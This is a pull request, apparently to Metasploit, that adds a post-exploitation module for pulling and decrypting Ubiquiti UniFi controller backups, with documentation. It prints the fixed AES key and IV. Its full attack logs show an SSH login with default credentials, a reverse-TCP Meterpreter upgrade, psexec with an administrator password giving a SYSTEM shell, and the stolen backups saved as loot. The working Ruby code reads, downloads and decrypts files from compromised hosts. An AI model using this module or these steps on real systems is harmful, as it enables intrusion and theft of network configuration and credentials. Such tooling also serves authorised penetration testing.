### PR TITLE
unifi backup downloader

### DIFF
--- a/documentation/modules/post/multi/gather/ubiquiti_unifi_backup.md
+++ b/documentation/modules/post/multi/gather/ubiquiti_unifi_backup.md
@@ -181,3 +181,19 @@ host           service  type                                      name          
 4.4.4.4                 ubiquiti.unifi.backup_decrypted           5.10.19.unf.broken.zip                                        application/zip  Ubiquiti Unifi Controller Decrypted Broken Backup Zip  /root/.msf4/loot/20190310155839_default_4.4.4.4_ubiquiti.unifi.b_661494.zip
 4.4.4.4                 ubiquiti.unifi.backup_decrypted_repaired  5.10.19.unf.zip                                               application/zip  Ubiquiti Unifi Controller Backup Zip                   /root/.msf4/loot/20190310155839_default_4.4.4.4_ubiquiti.unifi.b_212269.zip
 ```
+
+### Ubiquiti Unifi Controller 5.10.20 on OSX 10.14.4
+
+#### Module
+
+```
+msf5 post(multi/gather/ubiquiti_unifi_backup) > rexploit
+[*] Reloading module...
+
+[+] Read UniFi Controller file /Users/unifi/Library/Application Support/Unifi/data/system.properties
+[+] File /Users/unifi/Library/Application Support/UniFi/data/backup/5.10.20.unf saved to /root/.msf4/loot/20190406110342_default_1.1.1.1_ubiquiti.unifi.b_683102.unf
+[+] File 5.10.20.unf DECRYPTED and saved to /root/.msf4/loot/20190406110342_default_1.1.1.1_ubiquiti.unifi.b_122303.zip.  File needs to be repair via `zip -FF`
+[*] Attempting to repair zip file (this is normal)
+[+] File /Users/unifi/Library/Application Support/UniFi/data/backup/5.10.20.unf DECRYPTED and REPAIRED and saved to /root/.msf4/loot/20190406110342_default_1.1.1.1_ubiquiti.unifi.b_728913.zip.
+[*] Post module execution completed
+```

--- a/documentation/modules/post/multi/gather/ubiquiti_unifi_backup.md
+++ b/documentation/modules/post/multi/gather/ubiquiti_unifi_backup.md
@@ -1,10 +1,12 @@
 ## Vulnerable Application
 
-  This module works against UniFi Network Controller (5.10.19 confirmed, most likely others), to download any backup and
+  This module works against UniFi Network Controller (`5.10.19`-`5.10.23` confirmed, most likely others), to download any backup and
   autobackup files (.unf extension).  These files are AES encrypted zip files which use the IV `ubntenterpriseap` and
   key `bcyangkmluohmars`.  The unf zip file is then decrypted, however it contains an error in the file.  Utilizing
   `zip -FF` the file can be repaired and opened (some reports say 7zip can open the errored file).  If `zip` is
   available on the system, this operation is performed and the result saved to loot as well.
+
+  Due to the potential large file sizes of the backups, meterpreter is greatly encouraged over a shell.
 
   This work is based on zhangyoufu's [unifi-backup-decrypt](https://github.com/zhangyoufu/unifi-backup-decrypt)
   and justingist's [POSH-Ubiquiti](https://github.com/justingist/POSH-Ubiquiti/blob/master/Posh-UBNT.psm1).  
@@ -195,5 +197,47 @@ msf5 post(multi/gather/ubiquiti_unifi_backup) > rexploit
 [+] File 5.10.20.unf DECRYPTED and saved to /root/.msf4/loot/20190406110342_default_1.1.1.1_ubiquiti.unifi.b_122303.zip.  File needs to be repair via `zip -FF`
 [*] Attempting to repair zip file (this is normal)
 [+] File /Users/unifi/Library/Application Support/UniFi/data/backup/5.10.20.unf DECRYPTED and REPAIRED and saved to /root/.msf4/loot/20190406110342_default_1.1.1.1_ubiquiti.unifi.b_728913.zip.
+[*] Post module execution completed
+```
+
+### Using a SHELL With Multiple Larger Backups on Ubiquiti Unifi Controller 5.10.23
+
+An example of the output when not utilizing meterpreter (just a shell) to access the files.  The solution is to upgrade to meterpreter, which will
+work successfully.
+
+```
+msf5 post(multi/gather/ubiquiti_unifi_backup) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                   Information                                               Connection
+  --  ----  ----                   -----------                                               ----------
+  1         shell linux            SSH unifi:unifi (1.1.1.1:22)                              2.2.2.2:35125 -> 1.1.1.1:22 (1.1.1.1)
+  2         meterpreter x86/linux  uid=1000, gid=1000, euid=1000, egid=1000 @ 1.1.1.1        2.2.2.2:4433 -> 1.1.1.1:52584 (1.1.1.1)
+
+msf5 post(multi/gather/ubiquiti_unifi_backup) > session -i 1
+l[-] Unknown command: session.
+msf5 post(multi/gather/ubiquiti_unifi_backup) > sessions -i 1
+[*] Starting interaction with 1...
+
+ls -lah /var/lib/unifi/backup/*.unf
+-rw-r----- 1 unifi unifi  15K Mar 22 21:15 /var/lib/unifi/backup/5.10.19.unf
+-rw-r----- 1 unifi unifi 3.3M May 10 13:59 /var/lib/unifi/backup/5.10.20.unf
+-rw-r----- 1 unifi unifi 3.3M May 10 14:26 /var/lib/unifi/backup/5.10.23.unf
+^Z
+Background session 1? [y/N]  y
+msf5 post(multi/gather/ubiquiti_unifi_backup) > set session 1
+session => 1
+msf5 post(multi/gather/ubiquiti_unifi_backup) > run
+
+[!] SESSION may not be compatible with this module.
+[+] Read UniFi Controller file /var/lib/unifi/system.properties
+[+] File /var/lib/unifi/backup/5.10.19.unf saved to /root/.msf4/loot/20190510150128_default_1.1.1.1_ubiquiti.unifi.b_313804.unf
+[+] File 5.10.19.unf DECRYPTED and saved to /root/.msf4/loot/20190510150128_default_1.1.1.1_ubiquiti.unifi.b_129165.zip.  File needs to be repair via `zip -FF`
+[*] Attempting to repair zip file (this is normal)
+[+] File /var/lib/unifi/backup/5.10.19.unf DECRYPTED and REPAIRED and saved to /root/.msf4/loot/20190510150128_default_1.1.1.1_ubiquiti.unifi.b_016198.zip.
+[-] /var/lib/unifi/backup/5.10.20.unf read at 0 bytes.  Either file is empty or error reading.  If this is a shell, you need to upgrade to meterpreter!!!
+[-] /var/lib/unifi/backup/5.10.23.unf read at 0 bytes.  Either file is empty or error reading.  If this is a shell, you need to upgrade to meterpreter!!!
 [*] Post module execution completed
 ```

--- a/documentation/modules/post/multi/gather/ubiquiti_unifi_backup.md
+++ b/documentation/modules/post/multi/gather/ubiquiti_unifi_backup.md
@@ -26,9 +26,10 @@
 
 ## Scenarios
 
-### Ubiquiti Unifi Controller 5.10.19 (Build: atag_5.10.19_11646) on Ubuntu 18.04 and Windows 2012
+### Ubiquiti Unifi Controller 5.10.19 (Build: atag_5.10.19_11646) on Ubuntu 18.04
 
 #### Initial Access
+
 ```
 [*] Processing unifi.rb for ERB directives.
 resource (unifi.rb)> use auxiliary/scanner/ssh/ssh_login
@@ -51,6 +52,64 @@ resource (unifi.rb)> sessions -u 1
 [*] Sending stage (985320 bytes) to 2.2.2.2
 [*] Meterpreter session 2 opened (1.1.1.1:4433 -> 2.2.2.2:37124) at 2019-03-10 15:58:25 -0400
 [*] Command stager progress: 100.00% (773/773 bytes)
+```
+
+#### Module
+
+```
+resource (unifi.rb)> use post/multi/gather/ubiquiti_unifi_backup
+resource (unifi.rb)> set verbose true
+verbose => true
+resource (unifi.rb)> set session 2
+session => 2
+resource (unifi.rb)> run
+
+[*] File /var/lib/unifi/system.properties saved to /root/.msf4/loot/20190310155835_default_2.2.2.2_ubiquiti.system._487688.txt
+[+] Read UniFi Controller file /var/lib/unifi/system.properties
+[-] Directory doesn't exist: /data/autobackup
+[+] Found backup folder: /var/lib/unifi/backup
+[+] File /var/lib/unifi/backup/5.10.19.unf saved to /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_802011.unf
+[+] File 5.10.19.unf DECRYPTED and saved to /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_933774.zip.  File needs to be repair via `zip -FF`
+[*] Attempting to repair zip file (this is normal)
+[+] File /var/lib/unifi/backup/5.10.19.unf DECRYPTED and REPAIRED and saved to /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_271407.zip.
+[*] Post module execution completed
+```
+
+#### Details
+
+```
+msf5 post(multi/gather/ubiquiti_unifi_backup) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: uid=1000, gid=1000, euid=1000, egid=1000
+meterpreter > sysinfo
+Computer     : 2.2.2.2
+OS           : Ubuntu 18.04 (Linux 4.18.0-16-generic)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > background
+[*] Backgrounding session 2...
+msf5 post(multi/gather/ubiquiti_unifi_backup) > loot
+
+Loot
+====
+
+host           service  type                                      name                                                          content          info                                                   path
+----           -------  ----                                      ----                                                          -------          ----                                                   ----
+2.2.2.2                 ubiquiti.system.properties                /var/lib/unifi/system.properties                              text/plain                                                              /root/.msf4/loot/20190310155835_default_2.2.2.2_ubiquiti.system._487688.txt
+2.2.2.2                 ubiquiti.unifi.backup                     5.10.19.unf                                                   application/zip  Ubiquiti Unifi Controller Encrypted Backup Zip         /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_802011.unf
+2.2.2.2                 ubiquiti.unifi.backup_decrypted           5.10.19.unf.broken.zip                                        application/zip  Ubiquiti Unifi Controller Decrypted Broken Backup Zip  /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_933774.zip
+2.2.2.2                 ubiquiti.unifi.backup_decrypted_repaired  5.10.19.unf.zip                                               application/zip  Ubiquiti Unifi Controller Backup Zip                   /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_271407.zip
+```
+
+### Ubiquiti Unifi Controller 5.10.19 (Build: atag_5.10.19_11646) on Windows 2012
+
+#### Initial Access
+
+```
+[*] Processing unifi.rb for ERB directives.
 resource (unifi.rb)> use exploit/windows/smb/psexec
 resource (unifi.rb)> set smbpass Password123
 smbpass => Password123
@@ -71,23 +130,13 @@ resource (unifi.rb)> run
 meterpreter > background
 [*] Backgrounding session 3...
 ```
+
+#### Module
+
 ```
 resource (unifi.rb)> use post/multi/gather/ubiquiti_unifi_backup
 resource (unifi.rb)> set verbose true
 verbose => true
-resource (unifi.rb)> set session 2
-session => 2
-resource (unifi.rb)> run
-
-[*] File /var/lib/unifi/system.properties saved to /root/.msf4/loot/20190310155835_default_2.2.2.2_ubiquiti.system._487688.txt
-[+] Read UniFi Controller file /var/lib/unifi/system.properties
-[-] Directory doesn't exist: /data/autobackup
-[+] Found backup folder: /var/lib/unifi/backup
-[+] File /var/lib/unifi/backup/5.10.19.unf saved to /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_802011.unf
-[+] File 5.10.19.unf DECRYPTED and saved to /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_933774.zip.  File needs to be repair via `zip -FF`
-[*] Attempting to repair zip file (this is normal)
-[+] File /var/lib/unifi/backup/5.10.19.unf DECRYPTED and REPAIRED and saved to /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_271407.zip.
-[*] Post module execution completed
 resource (unifi.rb)> set session 3
 session => 3
 resource (unifi.rb)> run
@@ -101,20 +150,10 @@ resource (unifi.rb)> run
 [*] Post module execution completed
 [*] Starting persistent handler(s)...
 ```
-```
-msf5 post(multi/gather/ubiquiti_unifi_backup) > sessions -i 2
-[*] Starting interaction with 2...
 
-meterpreter > getuid
-Server username: uid=1000, gid=1000, euid=1000, egid=1000
-meterpreter > sysinfo
-Computer     : 2.2.2.2
-OS           : Ubuntu 18.04 (Linux 4.18.0-16-generic)
-Architecture : x64
-BuildTuple   : i486-linux-musl
-Meterpreter  : x86/linux
-meterpreter > background
-[*] Backgrounding session 2...
+#### Details
+
+```
 msf5 post(multi/gather/ubiquiti_unifi_backup) > sessions -i 3
 [*] Starting interaction with 3...
 
@@ -130,8 +169,6 @@ Logged On Users : 1
 Meterpreter     : x86/windows
 meterpreter > background
 [*] Backgrounding session 3...
-```
-```
 msf5 post(multi/gather/ubiquiti_unifi_backup) > loot
 
 Loot
@@ -139,12 +176,8 @@ Loot
 
 host           service  type                                      name                                                          content          info                                                   path
 ----           -------  ----                                      ----                                                          -------          ----                                                   ----
-2.2.2.2           ubiquiti.system.properties                /var/lib/unifi/system.properties                              text/plain                                                              /root/.msf4/loot/20190310155835_default_2.2.2.2_ubiquiti.system._487688.txt
-2.2.2.2           ubiquiti.unifi.backup                     5.10.19.unf                                                   application/zip  Ubiquiti Unifi Controller Encrypted Backup Zip         /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_802011.unf
-2.2.2.2           ubiquiti.unifi.backup_decrypted           5.10.19.unf.broken.zip                                        application/zip  Ubiquiti Unifi Controller Decrypted Broken Backup Zip  /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_933774.zip
-2.2.2.2           ubiquiti.unifi.backup_decrypted_repaired  5.10.19.unf.zip                                               application/zip  Ubiquiti Unifi Controller Backup Zip                   /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_271407.zip
-4.4.4.4           ubiquiti.system.properties                C:\Users\Administrator\Ubiquiti UniFi\data\system.properties  text/plain                                                              /root/.msf4/loot/20190310155838_default_4.4.4.4_ubiquiti.system._035659.txt
-4.4.4.4           ubiquiti.unifi.backup                     5.10.19.unf                                                   application/zip  Ubiquiti Unifi Controller Encrypted Backup Zip         /root/.msf4/loot/20190310155839_default_4.4.4.4_ubiquiti.unifi.b_024488.unf
-4.4.4.4           ubiquiti.unifi.backup_decrypted           5.10.19.unf.broken.zip                                        application/zip  Ubiquiti Unifi Controller Decrypted Broken Backup Zip  /root/.msf4/loot/20190310155839_default_4.4.4.4_ubiquiti.unifi.b_661494.zip
-4.4.4.4           ubiquiti.unifi.backup_decrypted_repaired  5.10.19.unf.zip                                               application/zip  Ubiquiti Unifi Controller Backup Zip                   /root/.msf4/loot/20190310155839_default_4.4.4.4_ubiquiti.unifi.b_212269.zip
-
+4.4.4.4                 ubiquiti.system.properties                C:\Users\Administrator\Ubiquiti UniFi\data\system.properties  text/plain                                                              /root/.msf4/loot/20190310155838_default_4.4.4.4_ubiquiti.system._035659.txt
+4.4.4.4                 ubiquiti.unifi.backup                     5.10.19.unf                                                   application/zip  Ubiquiti Unifi Controller Encrypted Backup Zip         /root/.msf4/loot/20190310155839_default_4.4.4.4_ubiquiti.unifi.b_024488.unf
+4.4.4.4                 ubiquiti.unifi.backup_decrypted           5.10.19.unf.broken.zip                                        application/zip  Ubiquiti Unifi Controller Decrypted Broken Backup Zip  /root/.msf4/loot/20190310155839_default_4.4.4.4_ubiquiti.unifi.b_661494.zip
+4.4.4.4                 ubiquiti.unifi.backup_decrypted_repaired  5.10.19.unf.zip                                               application/zip  Ubiquiti Unifi Controller Backup Zip                   /root/.msf4/loot/20190310155839_default_4.4.4.4_ubiquiti.unifi.b_212269.zip
+```

--- a/documentation/modules/post/multi/gather/ubiquiti_unifi_backup.md
+++ b/documentation/modules/post/multi/gather/ubiquiti_unifi_backup.md
@@ -1,0 +1,150 @@
+## Vulnerable Application
+
+  This module works against UniFi Network Controller (5.10.19 confirmed, most likely others), to download any backup and
+  autobackup files (.unf extension).  These files are AES encrypted zip files which use the IV `ubntenterpriseap` and
+  key `bcyangkmluohmars`.  The unf zip file is then decrypted, however it contains an error in the file.  Utilizing
+  `zip -FF` the file can be repaired and opened (some reports say 7zip can open the errored file).  If `zip` is
+  available on the system, this operation is performed and the result saved to loot as well.
+
+  This work is based on zhangyoufu's [unifi-backup-decrypt](https://github.com/zhangyoufu/unifi-backup-decrypt)
+  and justingist's [POSH-Ubiquiti](https://github.com/justingist/POSH-Ubiquiti/blob/master/Posh-UBNT.psm1).  
+
+### Install Instructions
+
+  1. Download the file from https://www.ui.com/download/unifi (Java required on Windows)
+  2. Install with default parameters
+  3. Login to `https://localhost:8443/manage` and click the gear icon in the bottom left
+  4. Select `Maintenance` then click `DOWNLOAD BACKUP` to create the backup file.
+
+## Verification Steps
+
+  1. Install the application
+  2. Get a shell
+  3. Do: ```use post/multi/gather/ubiquiti_unifi_backup```
+  4. Do: ```set session #```
+  5. Do: ```run```
+
+## Scenarios
+
+### Ubiquiti Unifi Controller 5.10.19 (Build: atag_5.10.19_11646) on Ubuntu 18.04 and Windows 2012
+
+#### Initial Access
+```
+[*] Processing unifi.rb for ERB directives.
+resource (unifi.rb)> use auxiliary/scanner/ssh/ssh_login
+resource (unifi.rb)> set username unifi
+username => unifi
+resource (unifi.rb)> set password unifi
+password => unifi
+resource (unifi.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (unifi.rb)> run
+[+] 2.2.2.2:22 - Success: 'unifi:unifi' 'uid=1000(unifi) gid=1000(unifi) groups=1000(unifi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare) Linux unifi 4.18.0-16-generic #17~18.04.1-Ubuntu SMP Tue Feb 12 13:35:51 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux '
+[*] Command shell session 1 opened (1.1.1.1:33389 -> 2.2.2.2:22) at 2019-03-10 15:58:18 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (unifi.rb)> sessions -u 1
+[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
+[*] Upgrading session ID: 1
+[*] Starting exploit/multi/handler
+[*] Started reverse TCP handler on 1.1.1.1:4433 
+[*] Sending stage (985320 bytes) to 2.2.2.2
+[*] Meterpreter session 2 opened (1.1.1.1:4433 -> 2.2.2.2:37124) at 2019-03-10 15:58:25 -0400
+[*] Command stager progress: 100.00% (773/773 bytes)
+resource (unifi.rb)> use exploit/windows/smb/psexec
+resource (unifi.rb)> set smbpass Password123
+smbpass => Password123
+resource (unifi.rb)> set smbuser Administrator
+smbuser => Administrator
+resource (unifi.rb)> set rhosts 4.4.4.4
+rhosts => 4.4.4.4
+resource (unifi.rb)> run
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 4.4.4.4:445 - Connecting to the server...
+[*] 4.4.4.4:445 - Authenticating to 4.4.4.4:445 as user 'Administrator'...
+[*] 4.4.4.4:445 - Selecting PowerShell target
+[*] 4.4.4.4:445 - Executing the payload...
+[+] 4.4.4.4:445 - Service start timed out, OK if running a command or non-service executable...
+[*] Sending stage (179779 bytes) to 4.4.4.4
+[*] Meterpreter session 3 opened (1.1.1.1:4444 -> 4.4.4.4:61034) at 2019-03-10 15:58:32 -0400
+
+meterpreter > background
+[*] Backgrounding session 3...
+```
+```
+resource (unifi.rb)> use post/multi/gather/ubiquiti_unifi_backup
+resource (unifi.rb)> set verbose true
+verbose => true
+resource (unifi.rb)> set session 2
+session => 2
+resource (unifi.rb)> run
+
+[*] File /var/lib/unifi/system.properties saved to /root/.msf4/loot/20190310155835_default_2.2.2.2_ubiquiti.system._487688.txt
+[+] Read UniFi Controller file /var/lib/unifi/system.properties
+[-] Directory doesn't exist: /data/autobackup
+[+] Found backup folder: /var/lib/unifi/backup
+[+] File /var/lib/unifi/backup/5.10.19.unf saved to /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_802011.unf
+[+] File 5.10.19.unf DECRYPTED and saved to /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_933774.zip.  File needs to be repair via `zip -FF`
+[*] Attempting to repair zip file (this is normal)
+[+] File /var/lib/unifi/backup/5.10.19.unf DECRYPTED and REPAIRED and saved to /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_271407.zip.
+[*] Post module execution completed
+resource (unifi.rb)> set session 3
+session => 3
+resource (unifi.rb)> run
+[*] File C:\Users\Administrator\Ubiquiti UniFi\data\system.properties saved to /root/.msf4/loot/20190310155838_default_4.4.4.4_ubiquiti.system._035659.txt
+[+] Read UniFi Controller file C:\Users\Administrator\Ubiquiti UniFi\data\system.properties
+[+] Found backup folder: C:\Users\Administrator\Ubiquiti Unifi\data\backup
+[+] File C:\Users\Administrator\Ubiquiti Unifi\data\backup/5.10.19.unf saved to /root/.msf4/loot/20190310155839_default_4.4.4.4_ubiquiti.unifi.b_024488.unf
+[+] File 5.10.19.unf DECRYPTED and saved to /root/.msf4/loot/20190310155839_default_4.4.4.4_ubiquiti.unifi.b_661494.zip.  File needs to be repair via `zip -FF`
+[*] Attempting to repair zip file (this is normal)
+[+] File C:\Users\Administrator\Ubiquiti Unifi\data\backup/5.10.19.unf DECRYPTED and REPAIRED and saved to /root/.msf4/loot/20190310155839_default_4.4.4.4_ubiquiti.unifi.b_212269.zip.
+[*] Post module execution completed
+[*] Starting persistent handler(s)...
+```
+```
+msf5 post(multi/gather/ubiquiti_unifi_backup) > sessions -i 2
+[*] Starting interaction with 2...
+
+meterpreter > getuid
+Server username: uid=1000, gid=1000, euid=1000, egid=1000
+meterpreter > sysinfo
+Computer     : 2.2.2.2
+OS           : Ubuntu 18.04 (Linux 4.18.0-16-generic)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > background
+[*] Backgrounding session 2...
+msf5 post(multi/gather/ubiquiti_unifi_backup) > sessions -i 3
+[*] Starting interaction with 3...
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-OBKF2JFCDKL
+OS              : Windows 2012 (Build 9200).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+meterpreter > background
+[*] Backgrounding session 3...
+```
+```
+msf5 post(multi/gather/ubiquiti_unifi_backup) > loot
+
+Loot
+====
+
+host           service  type                                      name                                                          content          info                                                   path
+----           -------  ----                                      ----                                                          -------          ----                                                   ----
+2.2.2.2           ubiquiti.system.properties                /var/lib/unifi/system.properties                              text/plain                                                              /root/.msf4/loot/20190310155835_default_2.2.2.2_ubiquiti.system._487688.txt
+2.2.2.2           ubiquiti.unifi.backup                     5.10.19.unf                                                   application/zip  Ubiquiti Unifi Controller Encrypted Backup Zip         /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_802011.unf
+2.2.2.2           ubiquiti.unifi.backup_decrypted           5.10.19.unf.broken.zip                                        application/zip  Ubiquiti Unifi Controller Decrypted Broken Backup Zip  /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_933774.zip
+2.2.2.2           ubiquiti.unifi.backup_decrypted_repaired  5.10.19.unf.zip                                               application/zip  Ubiquiti Unifi Controller Backup Zip                   /root/.msf4/loot/20190310155836_default_2.2.2.2_ubiquiti.unifi.b_271407.zip
+4.4.4.4           ubiquiti.system.properties                C:\Users\Administrator\Ubiquiti UniFi\data\system.properties  text/plain                                                              /root/.msf4/loot/20190310155838_default_4.4.4.4_ubiquiti.system._035659.txt
+4.4.4.4           ubiquiti.unifi.backup                     5.10.19.unf                                                   application/zip  Ubiquiti Unifi Controller Encrypted Backup Zip         /root/.msf4/loot/20190310155839_default_4.4.4.4_ubiquiti.unifi.b_024488.unf
+4.4.4.4           ubiquiti.unifi.backup_decrypted           5.10.19.unf.broken.zip                                        application/zip  Ubiquiti Unifi Controller Decrypted Broken Backup Zip  /root/.msf4/loot/20190310155839_default_4.4.4.4_ubiquiti.unifi.b_661494.zip
+4.4.4.4           ubiquiti.unifi.backup_decrypted_repaired  5.10.19.unf.zip                                               application/zip  Ubiquiti Unifi Controller Backup Zip                   /root/.msf4/loot/20190310155839_default_4.4.4.4_ubiquiti.unifi.b_212269.zip
+

--- a/modules/post/multi/gather/ubiquiti_unifi_backup.rb
+++ b/modules/post/multi/gather/ubiquiti_unifi_backup.rb
@@ -8,6 +8,7 @@ require 'zip'
 class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Windows::UserProfiles
+  include Msf::Post::OSX::System
 
   def initialize(info={})
     super( update_info( info,
@@ -71,9 +72,9 @@ class MetasploitModule < Msf::Post
     when 'windows'
       files = session.fs.dir.foreach(d)
     when 'linux', 'osx'
-      files = cmd_exec("ls #{d}").split(/\r\n|\r|\n/)
+      # osx will have a space in it by default, so we wrap the directory in quotes
+      files = cmd_exec("ls '#{d}'").split(/\r\n|\r|\n/)
     end
-
     files.each do |file|
       full = "#{d}/#{file}"
       if directory?(full) && !['.', '..'].include?(file)
@@ -132,8 +133,8 @@ class MetasploitModule < Msf::Post
       backup_locations = []
       sprop_locations = []
       get_users.each do |user|
-        backup_locations << "/Users/#{user}/Library/Application Support/UniFi/data/backup"
-        sprop_locations  << "/Users/#{user}/Library/Application Support/Unifi/data/system.properties"
+        backup_locations << "/Users/#{user['name']}/Library/Application Support/UniFi/data/backup"
+        sprop_locations  << "/Users/#{user['name']}/Library/Application Support/Unifi/data/system.properties"
       end
     end
 

--- a/modules/post/multi/gather/ubiquiti_unifi_backup.rb
+++ b/modules/post/multi/gather/ubiquiti_unifi_backup.rb
@@ -150,6 +150,7 @@ class MetasploitModule < Msf::Post
       vprint_status("Utilizing custom system.properties file location: #{datastore['SYSTEMFILE']}")
     end
 
+    print_status("Attempting to read system.properties file to determine backup locations.")
     # https://help.ubnt.com/hc/en-us/articles/205202580-UniFi-system-properties-File-Explanation
     sprop_locations.each do |sprop|
       next unless exists?(sprop)
@@ -172,6 +173,7 @@ class MetasploitModule < Msf::Post
       end
     end
 
+    print_status("Attempting to locate and read backup files.")
     backup_locations.each do |bl|
       if not directory?(bl)
         vprint_error("Directory doesn't exist: #{bl}")

--- a/modules/post/multi/gather/ubiquiti_unifi_backup.rb
+++ b/modules/post/multi/gather/ubiquiti_unifi_backup.rb
@@ -16,7 +16,9 @@ class MetasploitModule < Msf::Post
       'Description'   => %q{
         On an Ubiquiti UniFi controller, reads the system.properties configuration file
         and downloads the backup and autobackup files.  The files are then decrypted using
-        a known encryption key, then attempted to be repaired by zip.
+        a known encryption key, then attempted to be repaired by zip.  Meterpreter must be
+        used due to the large file sizes, which can be flaky on regular shells to read.
+        Confirmed to work on 5.10.19 - 5.10.23, but most likely quite a bit more.
       },
       'License'       => MSF_LICENSE,
       'Author'        =>
@@ -26,7 +28,7 @@ class MetasploitModule < Msf::Post
           'justingist' # git script
         ],
       'Platform' => [ 'linux', 'win', 'osx' ],
-      'SessionTypes' => %w[shell meterpreter],
+      'SessionTypes' => %w[meterpreter],
       'References' =>
         [
           ['URL', 'https://github.com/zhangyoufu/unifi-backup-decrypt/'],
@@ -87,6 +89,10 @@ class MetasploitModule < Msf::Post
       end
 
       f = read_file(full)
+      if f.nil?
+        print_error("#{full} read at 0 bytes.  Either file is empty or error reading.  If this is a shell, you need to upgrade to meterpreter!!!")
+        next
+      end
       loot_path = store_loot('ubiquiti.unifi.backup', 'application/zip', session,
                              f, file, 'Ubiquiti Unifi Controller Encrypted Backup Zip')
       print_good("File #{full} saved to #{loot_path}")

--- a/modules/post/multi/gather/ubiquiti_unifi_backup.rb
+++ b/modules/post/multi/gather/ubiquiti_unifi_backup.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Post
           'zhangyoufu', # git scripts
           'justingist' # git script
         ],
-      'Platform' => [ 'linux', 'win' ],
+      'Platform' => [ 'linux', 'win', 'osx' ],
       'SessionTypes' => %w[shell meterpreter],
       'References' =>
         [
@@ -70,7 +70,7 @@ class MetasploitModule < Msf::Post
     case session.platform
     when 'windows'
       files = session.fs.dir.foreach(d)
-    when 'linux'
+    when 'linux', 'osx'
       files = cmd_exec("ls #{d}").split(/\r\n|\r|\n/)
     end
 
@@ -116,8 +116,8 @@ class MetasploitModule < Msf::Post
       backup_locations = []
       sprop_locations = []
       grab_user_profiles().each do |user|
-        backup_locations.append("#{user['ProfileDir']}\\Ubiquiti Unifi\\data\\backup")
-        sprop_locations.append("#{user['ProfileDir']}\\Ubiquiti UniFi\\data\\system.properties")
+        backup_locations << "#{user['ProfileDir']}\\Ubiquiti Unifi\\data\\backup"
+        sprop_locations << "#{user['ProfileDir']}\\Ubiquiti UniFi\\data\\system.properties"
       end
     when 'linux'
       # https://help.ubnt.com/hc/en-us/articles/226218448-UniFi-How-to-Configure-Auto-Backup
@@ -127,6 +127,14 @@ class MetasploitModule < Msf::Post
       ]
 
       sprop_locations = ['/var/lib/unifi/system.properties'] #default location on 5.10.19 on ubuntu 18.04
+    when 'osx'
+      # https://github.com/rapid7/metasploit-framework/pull/11548#issuecomment-472568795
+      backup_locations = []
+      sprop_locations = []
+      get_users.each do |user|
+        backup_locations << "/Users/#{user}/Library/Application Support/UniFi/data/backup"
+        sprop_locations  << "/Users/#{user}/Library/Application Support/Unifi/data/system.properties"
+      end      
     end
 
     # read system.properties

--- a/modules/post/multi/gather/ubiquiti_unifi_backup.rb
+++ b/modules/post/multi/gather/ubiquiti_unifi_backup.rb
@@ -1,0 +1,171 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'zip'
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Windows::UserProfiles
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Multi Gather Ubiquiti UniFi Controller Backup',
+      'Description'   => %q{
+        On an Ubiquiti UniFi controller, reads the system.properties configuration file
+        and downloads the backup and autobackup files.  The files are then decrypted using
+        a known encryption key, then attempted to be repaired by zip.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        =>
+        [
+          'h00die', #metasploit module
+          'zhangyoufu', # git scripts
+          'justingist' # git script
+        ],
+      'Platform' => [ 'linux', 'win' ],
+      'SessionTypes' => %w[shell meterpreter],
+      'References' =>
+        [
+          ['URL', 'https://github.com/zhangyoufu/unifi-backup-decrypt/'],
+          ['URL', 'https://github.com/justingist/POSH-Ubiquiti/blob/master/Posh-UBNT.psm1'],
+          ['URL', 'https://help.ubnt.com/hc/en-us/articles/205202580-UniFi-system-properties-File-Explanation'],
+          ['URL', 'https://community.ubnt.com/t5/UniFi-Wireless/unf-controller-backup-file-format/td-p/1624105']
+        ]
+    ))
+
+      register_options([
+        OptPath.new('SYSTEMFILE', [false, 'Custom system.properties file location']),
+        OptPath.new('BACKUPFOLDER', [false, 'Custom backup folder']),
+      ])
+  end
+
+  def decrypt(contents)
+    aes = OpenSSL::Cipher.new('aes-128-cbc')
